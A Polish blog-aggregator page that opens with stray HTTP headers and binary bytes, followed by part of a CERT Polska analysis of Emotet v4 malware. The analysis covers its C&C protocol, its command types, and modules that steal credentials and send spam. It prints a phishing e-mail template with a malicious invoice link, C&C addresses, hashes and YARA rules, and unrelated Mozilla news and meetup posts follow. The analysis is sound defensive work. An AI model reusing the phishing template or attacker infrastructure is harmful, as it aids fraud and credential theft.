Content-Type: text/html; charset=UTF-8
Content-Length: 728740
Connection: keep-alive

alc:*qLud<d^G̾>...

Struktura zaszyfrowanej odpowiedzi jest podobna do struktury żądania. Do szyfrowania wykorzystywany jest klucz AES wygenerowany przez próbkę i przekazany w żądaniu. Po odszyfrowaniu, otrzymujemy komunikat o strukturze odpowiadającej następującemu plikowi protobuf:

W tym przypadku wykorzystywane jest niestandardowe kodowanie, o którym wspomnieliśmy na samym początku. Otóż pole repeated Module modules = 1 [packed=true]; jest niedozwolone w kontekście języka struktur protobuf, ponieważ atrybut packed może być zastosowany wyłącznie do typów liczbowych, a nie do obiektów typu Message.

Przenosząc to na opis odpowiadający kodowaniu wykorzystywanemu w Protocol Buffers, odpowiedź ma następującą strukturę:

Typ Nazwa Komentarz
ModuleResponse
TAG tag 0x0a
VARINT rozmiar wszystkich elementów ‚modules’
Module (dla każdego modułu)
VARINT długość elementu
TAG tag pola ‚type’ 0x08
VARINT ‚type’
TAG tag pola ‚blob’ 0x12
VARINT rozmiar pola ‚blob’
RAW zawartość ‚blob’

Warto zaobserwować, iż elementy Module są powtarzane bez poprzedzającego tagu, co jest charakterystyczne dla kodowania packed.

Pole type

Pole type definiuje typ bufora i sposób w jaki należy potraktować jego zawartość. Może przyjmować następujące wartości:

Numer komendy Opis
1 Zapisz do %TEMP% i wykonaj z parametrem -U
2 Podobnie jak ‚1’, ale bez dodatkowego parametru
3 Pobierz plik wykonywalny z URLa podanego w ‚blob’
4 Użyj wewnętrznego loadera – załaduj i wykonaj plik wykonywalny zawarty w ‚blob’
5 Deinstalacja – usuń skojarzony skrót ‚.lnk’ malware’u z folderu Autostart
inne Nie rób nic

Moduły

W poprzednich wersjach wśród modułów zawarte były elementy odpowiadające za takie funkcjonalności jak:

W wersji 4 dystrybuowanej m.in. w ostatniej kampanii podszywającej się pod DHL, nie zaobserwowaliśmy modułu dość charakterystycznego dla Emoteta, czyli modułu bankowego. Zachowanie pozostałych modułów w większości pozostało jednak bez zmian. Poniżej zawarty jest opis modułów zaobserwowanych w omawianej kampanii:

Moduły wykradające dane dostępowe

Wśród zaobserwowanych modułów znajdowały się dwa, służące do wykradania haseł i danych dostępowych z przeglądarki i klienta pocztowego.
Oba moduły do swoich celów wykorzystywały oprogramowanie firmy NirSoft:

Obie aplikacje zawarte były bezpośrednio w pliku wykonywalnym modułów, zakodowane prostą operacją XOR z 32-bitowym kluczem. Po odkodowaniu i zapisaniu do %TEMP%, wykonywane były z parametrem /scomma [nazwa pliku tymczasowego], co prowadziło do zapisania wszystkich haseł do pliku w %TEMP% (nazwa generowana przez GetTempFileNameW). Następnie dane wysyłane były do serwera C&C.

Moduł spamowy

Trzeci zaobserwowany przez nas moduł, służący do rozsyłania spamu zawierającego link do Emoteta jest szczególnie interesujący. Na początku moduł prosi serwer C&C o szablon wiadomości, listę odbiorców i listę kont, z których ma być przeprowadzone rozsyłanie.
Struktura żądania wygląda następująco:

Pola flags i additionalData służą do określania, jakie dane zostały już pozyskane od kontrolera i jakich oczekujemy w odpowiedzi.
Odpowiedź serwera ma następującą strukturę:

Do poszczególnych botów wysyłane są nie tylko dane dotyczące rozsyłanych wiadomości, ale również lista danych dostępowych do kont, z których ma być przeprowadzone rozsyłanie. Konta prawdopodobnie są pozyskiwane przez moduł wykorzystujący Mail PassView, opisany wcześniej.

Przykładowy szablon wiadomości:

Hello <span style="text-transform: uppercase;">&lt;&gt;</span>

Thank you for your order. The details can be found below.

Invoice attached: <a href="http://aceeight.com/Cust-000564-17424/">http://aceeight.com/Cust-000564-17424/&lt;&gt;</a>

This e-mail was sent by <span style="text-transform: uppercase;">&lt;&gt;
&lt;&gt;</span>

Podsumowanie

Podstawową funkcją Emoteta obserwowaną w niedawnych kampaniach jest wykradanie danych dostępowych. W przypadku infekcji zalecamy przede wszystkim zmianę haseł do wykorzystywanych skrzynek mailowych z poziomu lokalnego klienta poczty, a także haseł do serwisów, które były zapisane w przeglądarce.
Emotet jest wciąż aktywny w sieci i istnieje szansa, że ten rodzaj zagrożenia pojawi się w przyszłych kampaniach.

Informacje dodatkowe

Analiza oparta jest na próbce c53956c95100c5c0ba342977f8fc44fcad35aabc24ec44cb12bb83eee1ed34fa

Lista skrótów MD5 modułów (widoczne 13 kwietnia):

0497c120248c6f00f1ac37513bd572e5
5b2d58b4104309ee9c93b455d39c7314
722268bad0d3a2e90aa148d52c60943e

Lista adresów C&C

hxxp://87.106.105.76:443
hxxp://173.255.229.121:443
hxxp://178.79.177.141:443
hxxp://79.170.95.202:7080
hxxp://206.214.220.79:8080
hxxp://88.198.50.221:8080
hxxp://5.39.84.48:8080
hxxp://188.68.58.8:7080
hxxp://162.214.11.56:7080
hxxp://5.196.73.150:8080
hxxp://203.121.145.40:7080
hxxp://46.165.212.76:7080

Klucz publiczny C&C:

-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAJ16QBv5Csq0eruFy4BvTcXmmIyeqUb3
vCCc8K/zOYOpL/Ww6FCdUpvPfs+RR/sLBalwtKmT14iRUaNmJdygnAKUIRWR1HNt
0rQRir0pD4QlkXlnZ9lZazTfyMV8BLCatwIDAQAB
-----END PUBLIC KEY-----

Reguły Yara:

rule emotet4_basic: trojan
{
    meta:
        author = "psrok1/mak"
        module = "emotet"
    strings:
        $emotet4_rsa_public = { 8d ?? ?? 5? 8d ?? ?? 5? 6a 00 68 00 80 00 00 ff 35 [4] ff 35 [4] 6a 13 68 01 00 01 00 ff 15 [4] 85 }
        $emotet4_cnc_list = { 39 ?? ?5 [4] 0f 44 ?? (FF | A3)}
    condition:
        all of them
}

rule emotet4: trojan
{
    meta:
        author = "psrok1"
        module = "emotet"
    strings:
        $emotet4_x65599 = { 0f b6 ?? 8d ?? ?? 69 ?? 3f 00 01 00 4? 0? ?? 3? ?? 72 }
    condition:
        any of them and emotet4_basic
}

rule emotet4_spam : spambot
{
    meta:
        author="mak"
        module="emotet"
    strings:
        $login="LOGIN" fullword
        $startls="STARTTLS" fullword
        $mailfrom="MAIL FROM:"
    condition:
        all of them and emotet4_basic
}

Artykuł Analiza złośliwego oprogramowania Emotet v4 pochodzi z serwisu CERT Polska.

Paweł Srokosz, 24 maja 2017, 11:30

9 maja 2017

Centrum prasowe Mozilli

Napraw unijne prawo autorskie: Mozilla i Moniker stworzyli cyfrowe narzędzie, które zmusza polityków do unowocześnienia prawa autorskiego w Unii Europejskiej

Przestarzałe prawo autorskie zagraża Internetowi w Unii Europejskiej.

Funkcjonujące obecnie prawo autorskie zostało stworzone przed epoką internetu i przeszkadza w kreowaniu innowacji, utrudnia przedsiębiorcom tworzenie na bazie istniejących danych lub kodów. Może ograniczać kreatywność, a tworzenie, udostępanie i edytowanie memów oraz innych treści będzie nielegalne. Może też zmniejszyć ilość materiałów, na których opierają się nauczyciele i organizacje pozarządowe takie jak Wikipedia, wykorzystując je do dzielenia się wiedzą.

Dlatego Mozilla zrzuca miliony ulotek na europejskie miasta.

W pewnym sensie.

Mozilla nie posiada floty zeppelinów. I lubimy oszczędzać papier.

Dlatego zbudowaliśmy Paperstorm.it. To cyfrowe narzędzie, które zachęca polityków w Unii Europejskiej do dostosowania prawa autorskiego do potrzeb ery internetowej.

Paperstorm pozwala na rozrzucenie ulotek o reformie prawa autorskiego na mapach charakterystycznych miejsc w Europie, na przykład na Pałac Kultury i Nauki w Warszawie. Kiedy zrzucisz ich odpowiednio dużo, twórcy unijnego prawa, tacy jak przewodniczący Komisji Prawnej Parlamentu Europejskiego Pavel Svoboda, zostaną poinformowani w mediach społecznościowych o potrzebie wsparcia reformy.

Samodzielnie możesz rozrzucić garść ulotek. Ale razem możemy zrzucić ich miliony – i wysłać jasną, mocną wiadomość do decydentów w Unii Europejskiej.

Paperstorm jest wynikiem współpracy między Mozillą a Moniker, nagrodzonym Webby Award interaktywnym studiem projektowym z Amsterdamu. Paperstorm to kolejny obok Codemoji i Post Crimes projekt Mozilli na rzecz działania w obronie mediów.

Dlaczego projekt rusza właśnie teraz? Reforma prawa autorskiego znajduje się w kluczowym momencie. Obecnie trwają prace nad poprawkami do nowego projektu regulacji, będą gotowe jeszcze w tym roku. Poprawki mogą zmienić prawo w taki sposób, by było bardziej przyjazne dla internetu lub wręcz przeciwnie – aby stało się bardziej restrykcyjne i zakorzenione w XX wieku.

Dobra wiadomość jest taka, że twórcy prawa nas słuchają. W zeszłym roku Mozilla i nasi sprzymierzeńcy zebrali setki tysięcy podpisów pod propozycją reformy prawa autorskiego, która sprzyjałaby innowacji i kreatywności w Europie. Niektórzy członkowie Parlamentu Europejskiego z zaangażowaniem pracowali nad ulepszeniem propozycji Komisji i wzięli pod uwagę niektóre zaproponowane przez nas zmiany, takie jak usunięcie obowiązkowych filtrów przy przesyłaniu treści, czy sprzeciwienie się rozszerzaniu praw autorskich wobec linków i wycinków.

Ale jeszcze wiele osób trzeba przekonać, by nie psuły internetu i zaczęły wspierać nowoczesną reformę prawa autorskiego, która wzmacnia twórców, innowatorów i wszystkich użytkowników internetu.

“Propozycja Komisji Europejskiej dotycząca modernizacji prawa autorskiego dla XXI wieku rozczarowuje”, mówi Raegan MacDonald, Senior Policy Manager Mozilli w Unii Europejskiej. “Zamiast promować innowacje i kreatywność w sieci, raczej by je stłumiła”.

“Szczególnie martwimy się przepisami dotyczącymi obowiązkowych filtrów przy wrzucaniu treści do sieci, które w imię ochrony praw autorskich wymusiłyby monitorowanie wszystkich przesyłanych treści na serwisach takich jak Soundcloud, eBay, a nawet Wikipedia” – dodaje McDonald. „Takie zobowiązanie miałoby katastrofalny wpływ na ekosystem internetowy oraz doprowadziłoby do tłumienia wolności słowa i wyeliminowania mniejszych graczy”.

“Paperstorm to jednocześnie narzędzie do mówienia o konkretnych problemach i projekt artystyczny” – mówi Luna Maurer, współzałożycielka Monikier. „Jest to sposób na zbadanie, jak świat cyfrowy krzyżuje się z tym rzeczywistym, a jednocześnie wspiera wolność słowa w sieci”.

Jeśli wspierasz rozsądne prawo autorskie w Unii Europejskiej – i lepszy Internet – dołącz do #paperstorm dzisiaj.

kornelia.gruszka, 9 maja 2017, 07:24

19 kwietnia 2017

Centrum prasowe Mozilli

Firefox teraz szybszy i bardziej stabilny dzięki Project Quantum

Nick Nguyen, April 19, 2017

Dzisiejsze wydanie Firefoksa to solidna porcja usprawnień w ramach Project Quantum oraz wiele widocznych ulepszeń, jak i tych mniej oczywistych.

Quantum Compositor przyśpiesza działanie Firefoksa i zapobiega problemom z grafiką w systemie Windows

Budujemy silnik nowej generacji dla przeglądarek, który w pełni wykorzysta możliwości nowoczesnego sprzętu. Dziś udostępniamy pierwszy, ważny element tego projektu, który nazwaliśmy “Quantum Compositor”.

Kilka szczegółów technicznych: wyodrębniliśmy rdzeń naszej przegladarki (kompozytor grafiki), aby działał niezależnie od głównego procesu Firefoksa. Kompozytor odpowiada za to, co widzisz na ekranie: spłaszcza wszystkie warstwy grafiki, z których korzysta przeglądarka – podobnie jak Photoshop łączy warstwy w jeden obraz. Quantum Compositor korzysta z karty graficznej a nie z procesora, i dzięki temu jest szybszy. Ponieważ pracuje on w osobnym procesie, jeśli coś pójdzie nie tak, nie zatrzyma to działania całego Firefoksa, ani nawet aktualnie otwartej karty.

W testach Quantum Compositor zmniejszył zawieszanie się przeglądarki o około 10%. Więcej możesz dowiedzieć się tutaj. Quantum Compositor będzie dostępny dla 70% użytkowników Firefoksa – dla tych korzystających z Windowsa 10, 8, 7 i komputerach z kartami graficznymi Intel, NVidia lub AMD.  

A jeśli chodzi o sprzęt firmy Apple – nakładanie na siebie kolejnych warstw jest już na tyle stabilne w systemie MacOS, że osobny kompozytor nie jest potrzebny.

Oszczędź miejsce na ekranie – i swoje oczy – dzięki nowym motywom i zakładkom

Zadaniem przeglądarki jest dostarczenie Ci tego, czego potrzebujesz, bez zbędnych

Dzisiejsze wydanie Firefoksa w wersji desktopowej zawiera dwa nowe motywy: Compact Light i Compact Dark. Compact Light zmniejsza rozmiar interfejsu przeglądarki zachowując jasne kolory. Compact Dark zmienia kolory na ciemne, żeby nie razić Twoich oczu, kiedy przeglądasz strony wieczorem. Aby włączyć któryś z motywów przejdź do Menu i wybierz Dodatki (lub kliknij tutaj). Potem wybierz Panel Wyglądu i motyw, który chciałbyś aktywować.  

Firefox na Androida ma także nowe ustawienia dla kart. Kiedy będziesz chciał otworzyć inną kartę, pokażą się one w dwóch kolumnach zamiast jednej i dzięki temu będzie można łatwiej przechodzić między kilkoma otwartymi kartami. Aby uruchomić tę opcję przejdź do Ustawienia > Ogólne.

Z łatwością kontroluj do czego witryna ma dostęp i kiedy może wysyłać Ci powiadomienia

Wiele stron, aby prawidłowo działać musi mieć Twoje pozwolenie na dostęp do sprzętu lub wysyłanie powiadomień. Na przykład, aplikacje do konferencji wideo potrzebują dostępu do kamery i mikrofonu, a mapy do lokalizacji – żebyś sam nie musiał wpisywać adresu. Podobnie strony z wiadomościami i media społecznościowe proszą o dostęp do wysyłania powiadomień o najświeższych i najważniejszych wydarzeniach.

Dzisiejsze wydanie Firefoksa w wersji desktopowej zawiera też zmieniony interfejs ekranu zarządzania uprawnieniami witryn. Teraz, kiedy odwiedzasz stronę, która wymaga dostępu do wrażliwych danych lub chce wysyłać Ci powiadomienia, zobaczysz na ekranie okienko, które szczegółowo poinformuje Cię o wszystkim, do czego dostęp chce mieć dana strona. Jeśli później będziesz chciał zmienić te ustawienia, wystarczy że klikniesz na ikonkę „i” w Awesome Bar.

Więcej o zmianach w Firefoksie dowiesz się tutaj.

Więcej nowości:

Aby dowiedzieć się o wszystkich zmianach przeczytaj ten wpis, poniżej wybraliśmy kilka ważniejszych:

Jeśli jesteś deweloperem i chciałbyś dowiedzieć się więcej o najnowszym wydaniu odwiedź Hacks blog

Mamy nadzieję, że podobają Wam się wprowadzone zmiany. 

 

 

 

 

kornelia.gruszka, 19 kwietnia 2017, 17:23

29 marca 2017

Centrum prasowe Mozilli

Ogłaszamy zwycięzców Equal Rating Innovation Challenge

Sześć miesięcy temu wystartował projekt Equal Rating Innovation Challenge, który miał na celu podkreślenie znaczenia koncepcji „Equal Rating”, nad którą pracuje Mozilla. Dodatkowo chcieliśmy znaleźć nowe możliwości zapewnienia dostępu do Internetu jeszcze szerszej grupie osób, zachowując przy tym neutralność sieci.

Otwarty i angażujący projekt

Projekt miał na celu dotarcie do lokalnych ekspertów, innowatorów, przedsiębiorców i badaczy z całego świata, aby pomóc Mozilli dostarczyć Internet kolejnemu miliardowi użytkowników. Obserwowanie jak w projekt angażują się społeczności i przedsiębiorcy, było bardzo ciekawym doświadczeniem.

Dzięki naszej stronie – equalrating.com – dotarliśmy do tysięcy ludzi na całym świecie poprzez webinary, konferencje i mniejsze wydarzenia. Otrzymaliśmy 98 zgłoszeń z 27 krajów, co tylko pokazuje jaki potencjał ma podejście Equal Rating. Wcześniej wiele osób uważało, że łatwy dostęp do Internetu ważny jest dla dużych firm i rządu, teraz zauważyły jak istotny jest on dla wszystkich.

W styczniu nasi jurorzy do półfinału wybrali 5 drużyn. Pracownicy Mozilli przez 6 tygodni wspierali je merytorycznie, aby pomóc półfinalistom doszlifować projekty, które zaprezentowali 9 marca w Nowym Jorku na konferencji Equal Rating. Trzymając się zasady Mozilli, że wszystko powinno być otwarte i jawne, przez kolejny tydzień trwała publiczna ankieta, której wyniki częściowo pomogły jurorom w podjęciu decyzji. Dziś mamy przyjemność ogłosić zwycięzców.

Zwycięzcy

Prawie jednomyślnie zwycięzcą Equal Rating Innovation Challenge został Gram Marg Solution for Rural Broadband, wygrywając 125 000 dolarów. Autorami projektu są profesor Abhay Karandikar, Dean (Faculty Affairs) i Institute Chair Professor of Electrical Engineering oraz Dr Sarbani Banerjee Belur, Senior Project Research Scientist, w Indian Institute of Technology (IIT) w Mumbaju w Indiach.

Dr Sarbani Banerjee Belur (India) prezentująca Gram Marg Solution for Rural Broadband na konferencji w Nowym Jorku

Gram Marg, które w języku Hindi oznacza mapę, zwróciło uwagę jurorów i publiczności skupiając się na potrzebie dostarczenia Internetu do 640,000 wiosek. Zespół pokazał jak wspaniałe rzeczy mogłyby osiągać te społeczności mając dostęp do serwisów e-Governance, systemów płatności, instytucji finansowych i ogólnych informacji. W celu zamknięcia przepaści cyfrowej i wzmocnienia tych wiejskich społeczności zespół Gram Marg stworzył pomysłową i „lokalną” technologię, która wykorzystuje białą przestrzeń na widmie telewizyjnym, co umożliwia pobieranie danych z klastrów WiFi w celu zapewnienia dostępu szerokopasmowego (5G).

Zespół naukowców i praktyków stworzył tanie i odporne na wstrząsy urządzenie TV UHF, które konwertuje sygnał 2.4 Ghz, aby połączyć wioski z trudno dostępnych terenów. Rozwiązanie było testowane w 25 wioskach, a prace miały na celu zmniejszenie kosztów, rozmiarów i udoskonalenie produktów.

„Jesteśmy bardzo szczęśliwi, że jury wybrało nasz projekt” – powiedział profesor Karandikar. „Będziemy kontynuować prace nad naszym rozwiązaniem, aby stało się jeszcze bardziej wydajne. Pracujemy też nad modelem biznesowym, który pomoże lokalnym przedsiębiorcom rozlokować i zarządzać dostępem do sieci. Wierzymy, że zdecentralizowany i stabilny model jest kluczem do sukcesu technologii mającej podłączyć do sieci tych, którzy nie mają do niej dostępu.”

Zdobywcami drugiego miejsca i nagrody w wysokości 75 000 dolarów zostało Afri-Fi: Free Public WiFi, projekt prowadzony przez Tima Humana (Afryka Południowa). Projekt jest rozszerzeniem wysoko ocenianego i odnoszącego sukcesy projektu Isizwe, który oferuje 500MB darmowego transferu każdego dnia, ale najważniejszym jego celem jest stworzenie stabilnego modelu biznesowego poprzez połączenie darmowych sieci wifi w całej Afryce Południowej i zachęcanie użytkowników do współpracy z reklamodawcami.

Zespół zaprezentował sposób, w jaki można użyć danych konsumenckich, chronić prywatność i wzmocnić przedsiębiorczość w ich rozwiązaniu. „Zespół udowodnił jak ich rozwiązanie darmowego Internetu wspiera rozwijające się społeczności w Afryce Południowej. Skupiają się na budowaniu społeczności, partnerstwa, rozwijania lokalnych społeczności przedsiębiorców, a celem tych działań jest dostarczenie Internetu do najbardziej zmarginalizowanych społeczności w Afryce Południowej” powiedział w imieniu jury Marlon Parker, złożyciel Reconstructed Living Labs.

Na koniec, nagrodę w wysokości 30 000 dolarów otrzymał Bruno Vianna (Brazylia) i jego zespół pracujący nad projektem Free Networks P2P Cooperative. Zamiast skupiać się na technologii, projekt obejmuje finansowy i logistyczny model, który może być dostosowany do norm i społeczności wioski. Zespół pracował nad zaangażowaniem grup do wspólnych aktywności, uczył ich korzystania z urządzeń. Jurorzy wzięli pod uwagę innowacyjne podejście zespołu do pomagania społecznościom w budowaniu ich własnej infrastruktury.


Od lewej do prawej:
• Steve Song (Canada), Freemium Mobile Internet (FMI)
• Dr Carlos Rey-Moreno (South Africa), Zenzeleni “Do it for yourselves” Networks (ZN)
• Bruno Vianna (Brazil), Free Networks P2P Cooperative
• Tim Genders (South Africa), Afri-Fi: Free Public WiFi
• Dr Sarbani Banerjee Belur (India), Gram Marg Solution for Rural Broadband

Bardzo dziękujemy wszystkim, którzy wzięli udział w konkursie, naszym jurorom za ich bezcenne rady i czas, mentorów Mozilli, za wsparcie półfinalistów w ulepszaniu ich projektów. Chcemy też podziękować wszystkim, którzy wzięli udział w głosowaniu online. W ciągu tygodnia dostaliśmy prawie 6 000 głosów, głównie na projekty Zenzeleni i Gram Marg.

Mozilla zapoczątkowała tę inicjatywę, ponieważ wierzymy, że wspólne rozwiązania mogą rozwiązać duże problemy. Dzięki temu projektowi nie tylko pokazaliśmy szerszy zakres rozwiązań, ale też rozpoczęliśmy dialog na ich temat i zbudowaliśmy społeczności skupiające się na rozwiązywaniu problemów.

Mamy nadzieję, że Equal Rating przyczyni się do bardziej intensywnych działań światowej społeczności na rzecz zapewnienia wszystkim dostępu do Internetu. Jak powiedział Omobola Johnson, były Minister Technologii Komunikacyjnych Nigerii i partner TLcom „Nie chodzi o problem osób nie mających połączenia z siecią, ale o ludzi, którzy mogą te połączenia tworzyć.” Zgadzamy się z tym całkowicie!

Zapraszamy na stronę equalrating.com, gdzie możesz dołączyć do naszej społeczności. Dziś gratulujemy naszym zwycięzcom za ich wizję i potencjał.

 

kornelia.gruszka, 29 marca 2017, 12:26

17 marca 2017

blog.end3r.com

Gamedev.js Warszawa #2

Drugie spotkanie Gamedev.js odbyło się w Kawiarni Hoża 51 - miejsce na tyle nam się spodobało, że zostaniemy w nim na dłużej.

Gamedev.js Warszawa #2

Jak można się było spodziewać frekwencja na drugim spotkaniu była niższa od pierwszego - wiadomo, że na nowy meetup sporo osób przyjdzie głównie z ciekawości. Mimo wszystko jestem zadowolony z efektu, bo po wszystkich prezentacjach mieliśmy jeszcze sporo czasu na dyskusje.

Sponsorami drugiego spotkania były: Mozilla, 10Clouds, Luxoft oraz BLUR. Zdjęcia znajdziecie tutaj, natomiast poniżej są linki do nagrań:


Pamiętajcie, by zasubskrybować nasz kanał YouTube, śledzić Twittera i Facebooka, oraz dołączyć do dyskusji na grupie Facebookowej. Cały czas poszukujemy także prelegentów i sponsorów - zgłaszajcie się na maila kontakt@gamedevjs.com!

Następne spotkanie odbędzie się już w środę, 22 marca - zapraszamy!
Andrzej Mazur, 17 marca 2017, 15:50

7 marca 2017

Centrum prasowe Mozilli

Wiele nowości w Firefoksie, między innymi wsparcie dla WebAssembly

Dzisiejsze wydanie Firefoksa zawiera nowe funkcje, które poprawiają działanie i bezpieczeństwo Firefoksa na wszystkich urządzeniach.

WebAssembly umożliwia prawie natywne działanie gier i aplikacji

Firefox jest pierwszą przeglądarką, która wspiera WebAssembly, kształtujący się standard zainspirowany przez projekt badawczy Mozilli. WebAssembly sprawia, że złożone aplikacje takie jak gry działają szybciej w przeglądarkach. Dotyczy to między innymi gier wideo w 3D, projektowania wspomaganego komputerowo, edycji wideo i obrazów oraz naukowych wizualizacji. Mamy nadzieję, że dzięki WebAssembly skorzystają też deweloperzy usprawniając wiele istniejących aplikacji.

Aby dowiedzieć się wiecej przeczytaj tego blog posta i obejrzyj wideo:

Łatwiejsze połączenie z Wi-Fi

Jeśli miałeś kiedyś problemy z hotelowym wi-fi, działo się tak prawdopodobnie dlatego, że musiałeś się połączyć przez wyskakujące okienko z logowaniem. Strony te są często problematyczne ze względu na trudności w ich wykryciu przez system operacyjny. Kiedy próbujesz otworzyć stronę, natrafiasz na problem.

Dzisiejsze wydanie automatycznie wykrywa te strony i informuje Cię o potrzebie zalogowania. Co więcej, Firefox zamieni certyfikat błędu na wiadomość zachęcającą do zalogowania się.

 

 

 

 

 

 

Firefox ostrzega przed niebezpiecznym logowaniem

Aby lepiej chronić Cię w sieci stale ulepszamy pasek adresu. Firefox wyświetla teraz ostrzeżenia jeśli klikniesz w pole nazwy użytkownika lub hasła na stronie, która nie ma szyfrowania HTTPS.

 

 

 

 

 

 

Co więcej, w najnowszym wydaniu pojawia się Grid Inspector, którym mogą zainteresować się deweloperzy. Więcej o CSS Grid i narzędziach dla deweloperów dostępnych tylko w Firefoksie dowiecie się na blogu Hacks.

W tym wydaniu poprawiliśmy także bezpieczeństwo i wydajność blokując wszystkie wtyczki używające Netscape Plugin API (NPAPI), poza Flashem. Jeszcze w tym roku planujemy wprowadzić zmiany, dzięki którym Flash będzie aktywowany tylko, jeśli użytkownik się na to zgodzi.

Mamy nadzieję, że podoba Wam się nowe wydanie i czekamy na wasze opinie.

Więcej:

 

 

 

 

 

 

 

kornelia.gruszka, 7 marca 2017, 17:21

28 lutego 2017

Centrum prasowe Mozilli

Mozilla przejmuje Pocket

Denelle Dixon-Thayer

27 lutego 2017

Z przyjemnością ogłaszamy, że Mozilla przejęła Read It Later, Inc., twórcę aplikacji Pocket.

Mozilla stale się rozwija, eksperymentuje i intensyfikuje starania, aby Internet był bezpiecznym, globalnym źródłem informacji dostępnym dla wszystkich. Pocket sprawi, że będziemy bardziej widoczni na urządzeniach mobilnych, a także dostarczy użytkownikom narzędzi potrzebnych by mieć dostęp do wysokiej jakości treści czy niezależnych platform na ich warunkach.

Pocket dołączy do produktów Mozilli razem z przeglądarkami Firefox, skupiając się na promowaniu łatwego dostępu do treści wysokiej jakości. (Link do blog posta przygotowanego przez Pocket). Zespół pracujący przy aplikacji wesprze inicjatywę Mozilli Context Graph.

„Jesteśmy przekonani, że dostępność wysokiej jakości treści w Sieci jest kluczem do utrzymania bezpiecznego Internetu poprzez walkę z narastającą fali centralizacji i zamkniętymi platformami. Pocket daje użytkownikom narzędzia, których potrzebują, aby mogli się angażować i udostępniać treści na własnych zasadach, niezależnie od platformy sprzętowej lub treści. Dzięki temu ich aktywność online może być bardziej bezpieczna, samodzielna i niezależna” – Chris Beard, CEO Mozilli

Pocket wnosi do Mozilli ciekawy projekt z 10 milionami unikalnych użytkowników miesięcznie na iOS, Androidzie i w Sieci oraz ponad 3 miliardami zachowanych treści.

W ciągu ostatniego roku, ściśle współpracując z zespołem pracującym przy Pocket nad zintegrowaniem aplikacji z Firefoksem, stworzyliśmy wspólną wizję tego, co możemy razem zrobić i właśnie to nas połączyło.

„Bardzo dobrze oceniamy współpracę z Mozillą w ciągu ostatniego roku. Jesteśmy ciekawi jak współpraca wpłynie na rozwój aplikacji i nowych produktów dla naszych użytkowników” – Nate Weiner, Pocket CEO

W wyniku przejęcia Pocket będzie własnością Mozilla Corporation i stanie się częścią projektu open source Mozilli.

O Mozilli: Od ponad 15 lat Mozilla staje w obronie otwartej Sieci. Promujemy otwarte standardy, które umożliwiają innowacje i ulepszają Sieć jako platformę dla wszystkich. Dziś, setki milionów ludzi na całym świecie używają przeglądarki Mozilla Firefox na komputerach stacjonarnych, tabletach i innych urządzeniach mobilnych. Więcej informacji na stronie: www.mozilla.org.

O aplikacji Pocket: Pocket, stworzony przez Read It Later, Inc., jest liderem wśród aplikacji, pozwalających zachować treści do przeczytania później. Obecnie korzysta z niego ponad 10 milionów użytkowników miesięcznie, ponieważ jest zintegrowany z aplikacjami takimi jak Flipboard i Twitter. Pocket umożliwia zapisanie artykułów, materiałów wideo i więcej. Zachowane materiały są dostępne na wszystkich urządzeniach i platformach: Firefox, Google Chrome, Safari, iOS, Android i Windows. Więcej informacji: www.getpocket.com/about.

Pobież grafiki Pocket:

 

kornelia.gruszka, 28 lutego 2017, 12:03

13 lutego 2017

blog.end3r.com

Gamedev.js Warszawa #1 można uznać za udany

Pod koniec stycznia wystartowały spotkania Gamedev.js w Warszawie - świetna okazja, by zebrać warszawską (a może i Polską) społeczność twórców gier HTML5 w jednym miejscu.

Gamedev.js Warszawa #1

Pierwsza edycja odbyła się dwa tygodnie temu, we wtorek 31 stycznia w lokalu Państwomiasto. Wypadła bardzo dobrze - przyszło około 50-60 osób, nie było żadnych problemów technicznych, a opinie ludzi były jedynie pozytywne. Zdjęcia (autorstwa współorganizatora, Grześka Bagrowskiego) znajdziecie tutaj, natomiast linki do nagrań z prelekcji (autorstwa Kamila Grabowskiego z Whitestream) są poniżej:


Można tez obejrzeć całą playlistę z tego wydarzenia - pamiętajcie, by zasubskrybować kanał jeśli chcecie być na bieżąco z nagraniami z kolejnych spotkań. Pierwsza edycja odbyła się przy wsparciu sponsorów: Mozilli oraz Iterators - wielkie dzięki za zaufanie od samego początku! Podziękowania także dla prelegentów, którzy poświęcili czas, by opowiedzieć o swoich projektach. Pamiętaj: jeśli masz coś ciekawego o czym chciałbyś opowiedzieć przed społecznością, to odezwij się na kontakt@gamedevjs.com.

Gamedev.js Warszawa #1 people


Po ilości uczestników widać, że meetup ma spory potencjał - planujemy już kolejne spotkania, które chcielibyśmy organizować w miesięcznych odstępach. Co prawda nagrywanie prelekcji oraz kupony na piwo wiążą się z kosztami, ale wydaje nam się, że to jest jedyna słuszna droga. Chcielibyśmy także w przyszłości przygotować nasze naklejki, koszulki i inne gadżety, dlatego poszukujemy sponsorów - zgłoś się na kontakt@gamedevjs.com jeśli Twoja firma jest w stanie wspomóc naszą inicjatywę.

Drugie spotkanie odbędzie się już w następną środę, 22 lutego - zapraszamy wszystkich chętnych, wpadajcie!
Andrzej Mazur, 13 lutego 2017, 16:38

26 stycznia 2017

Centrum prasowe Mozilli

Firefox Focus teraz dostępny w 27 językach – także w języku polskim

Blog-FFx-Focus_Devices_1200x660.jpg

Już wkrótce Dzień Ochrony Danych Osobowych! Z tej okazji Firefox Focus, przeglądarka do prywatnego przeglądania, jest teraz dostępna w 27 językach dla miliardów użytkowników. Członkowie społeczności Mozilli ciężko pracowali nad dostarczeniem wszystkich wersji językowych na czas i jesteśmy im bardzo wdzięczni za pomoc. To oznacza, że mnóstwo użytkowników może używać teraz Focusa do prywatnego przeglądania w swoich językach, nie zostawiając śladów i zachowując swoją aktywność online tylko dla siebie.

Dzięki najnowszej wersji przeglądarki Focus użytkownicy będą mieli większą kontrolę nad swoją aktywnością w internecie. Po udostępnieniu Firefox Focus, zobaczyliśmy jak wielu użytkownikom zależy na prywatnym przeglądaniu stron internetowych, który pozwala użytkownikom na kasowanie ich historii za pomocą jednego dotknięcia. Chcieliśmy dać im możliwość korzystania z tego narzędzia w ojczystym języku.

Dla Mozilli, której priorytetem od zawsze jest globalność i społeczność, był to naturalny krok. Jeśli chcesz przeglądać prywatnie po arabsku, azersku, czesku, walijsku, niemiecku, angielsku (Stany Zjednoczone), esperanto, hiszpańsku (Chile), hiszpańsku (Hiszpania), francusku, węgiersku, indonezyjsku, włosku, japońsku, w języku kabyle, holendersku, polsku, portugalsku (Brazylia), rosyjsku, w języku songhay, słowacku, szwedzku, turecku, ukraińsku, chińsku (uproszczony i tradycyjny), od teraz możesz. Nie kończymy jeszcze prac nad dodawaniem kolejnych języków. Będziemy nadal współpracować z naszą społecznością, aby dodawać nowe języki do aplikacji.

